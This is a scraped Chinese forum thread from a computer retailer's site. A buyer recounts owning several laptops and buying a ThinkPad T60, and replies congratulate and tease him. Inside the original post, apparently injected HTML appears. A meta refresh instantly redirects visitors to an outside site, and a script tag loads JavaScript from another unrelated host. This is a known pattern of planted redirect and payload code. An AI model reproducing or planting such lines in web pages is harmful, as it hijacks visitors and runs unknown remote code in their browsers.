开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 购机手记------跨入双核

我喜欢笔记本已经有N年了,喜欢小黑也已经有N年了。记得N年前的小黑曾买到过天价,大概是8万多一台。这价钱使我却步。我只好耐心的等待。终于在N年前,网上讲本本可以走入寻常百姓家了,于是我揣着三万多块去找小黑。但是我喜欢的配置需要4万多!我迷茫了!这时,有个JS凑过来给我介绍了一款GATEWAY SOLO,我毅然决定拿下。这是我的第一台本本。见第一张图T60 和GATEWAY SOLO。

第二次买本,是基于太太想上网了,但是GATEWAY 不太符合太太的审美观点,于是去了中关村。转来转去,只有NEC 让太太满意。说实在的,日系本样子货,NEC的故障率太高,几乎让我跑断腿。也使我痛下决心!从此不看日系本。见第二张图!NEC 和T60。
   小黑情愫难断,去年我终于去专卖,迎得小黑归!第3张图,T43 和T60。
   今年的某一天,我偶然进了翔意的网站。一看价钱我惊呆了。哇!小黑还是可以飞入寻常百姓家的!支持国货,匹夫有责!联想吃了IBM,确实在很多国家受到了抵制!作为中国人还是要支持民族的产业。我虽说不宽裕,但也要挤出万把块钱来请个T60 。于是我今天去了翔意!
    翔意的购物环境稍微差点,有条件的话,希望摆两张硬木椅,提供点茶水什么的会更好!当然要是在提供免费香烟,可以说是十全十美了。工作人员的服务态度不错,就是不能给向我这样的爱国顾客提供优惠,倒是非常遗憾的事。现在我已经是贵宾了,如果管理员想起,可以把给贵宾优惠的100元退给我,随时通知我。我非常高兴得回到翔意,顺便再提几个人性化的建议!

+500---EddieFan
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

照片1 1.jpg
照片1 3.jpg
照片1 2.jpg

评分

EddieFan + 500

记得在网站上看到有的网友讲T60 的质量有所下降,我看到也未必!其实T43和T60之间的外观改动并不大。键盘的感觉几乎是一样的,只是T60的散热片已经改成铜的了,T43的应该是铝的。有人讲T60的显示屏发软,我倒是没有这种感觉。因为我花了N个小时来对比这两款机子没有发现T60 有质量下降的迹象。我是想告诉大家,没有必要觉得小黑属于我们中国人,我们中国人就会砸掉这个品牌。我们应该会做得更好!多一份理解,多一份支持,会使中国更强大。
lz没说买的什么型号啊,看不出来拉
写的挺好的
不错不错
原帖由 alexyang1000 于 2006-10-20 11:21 发表

我买的CA1 !不好意思!
原帖由 alexyang1000 于 2006-10-20 11:21 发表

我买的CA1 !不好意思!
原帖由 zhp0427 于 2006-10-20 17:07 发表
写的挺好的
多谢!夸赞!
原帖由 houston_tian 于 2006-10-20 18:45 发表
不错不错

承让!承让!
+500---EddieFan

我强烈抗议 我们以前发帖只有20的奖励~~~
呵呵,恭喜一下了:)
恭喜
有钱人就是多啊!!!!!!
不要把爱国放在这个上面

楼主不会是愤青

呵呵,楼主把买本上升到这样的高度,pfpf
看出LZ比较喜欢收藏本本,:ju8:
yy真大方,一出手就是500翔币

一个想法

双核双CPU应配双内存,这样才能体现出双CPU的优势!
羡慕啊,一直在努力中
好象楼住的本子不少呀
攒钱啊
楼主快成笔记本收藏家了   呵呵
俺开始也想买GATEWAY来者,看到小黑就放弃了,呵呵
楼主强!!!我们学生穷!
又一米人,羡慕!